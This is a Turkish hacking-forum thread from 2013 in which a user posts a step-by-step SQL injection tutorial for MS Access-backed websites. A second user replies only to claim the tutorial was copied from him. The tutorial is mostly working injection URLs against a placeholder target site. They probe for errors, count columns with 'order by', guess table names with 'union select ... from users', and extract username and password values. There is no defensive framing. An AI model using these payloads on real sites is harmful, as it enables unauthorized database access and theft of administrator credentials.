THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

MsAccess SQL İnjection -

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
07-11-2013 21:30
#1
MsAccess SQL İnjection -

bu konumda size çok karşılaşılan bir açık olan MsAccess sql injectiondan bahsedeceğim.

Ayrıca şunuda söyliyeyim: Bana göre en zahmetli SQL İnjection türüdür.Ama öğrenmek lazım

hemen geçelim:

Açık ararken klasik şekilde ’a veya ’ koyuyoruz.


hata geldi şimdi kolon bulucaz.


Alıntı:
www.hedefsite.com/show.php?id=3 order by 10
dedik hata geldi

Alıntı:
www.hedefsite.com/show.php?id=3 order by 9
dedik hata gitti demekki kolon sayımız 9muş.

Alıntı:
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from admin
diyoruz.

Farkettiyseniz direkt olarak union select komutu yazmadım sonuna adminde ekledim.Çünkü MsAccess’de direkt olarak kolonlar gözükmez.

yukarda komutumuzu girmiştik hata geldi.

tekrar deniyoruz:

Alıntı:
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,5,6,7,8,9 from users

dedik ve kolonları gördük.Yani admin’imizle ilgili tablomuz users’imiş.

5. kolon gözükmüş olsun.


Alıntı:
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,admin,6,7,8,9 from users
dedik hata geldi.Çünkü yanlış kolon adı girdik.pes etmiyoruz

Alıntı:
www.hedefsite.com/show.php?id=3 union select 1,2,3,4,username,6,7,8,9 from users
dedik ve kolonumuzda gözüktü usernamemiz.

username = HoLMeS

şimdi sıra şifrede

Alıntı:
www.hedefsite.com/show.php?id=3 union select 1,2,3,pass,5,6,7,8,9 from users
dedik ve şifrede gözüktü.

username = HoLMeS
pass = holmes

buraya kadar arkadaşlar.


HaCKeR HoLMeS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
133
Konular:
39
Teşekkür (Etti):
22
Teşekkür (Aldı):
12
Ticaret:
(0) %
07-11-2013 22:06
#2
arkadaşlar konu benden alıntıdır hatta kanıtı konunun içindedir.lütfen alıntı olduğu belirtilsin yada gereği yapılsın

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler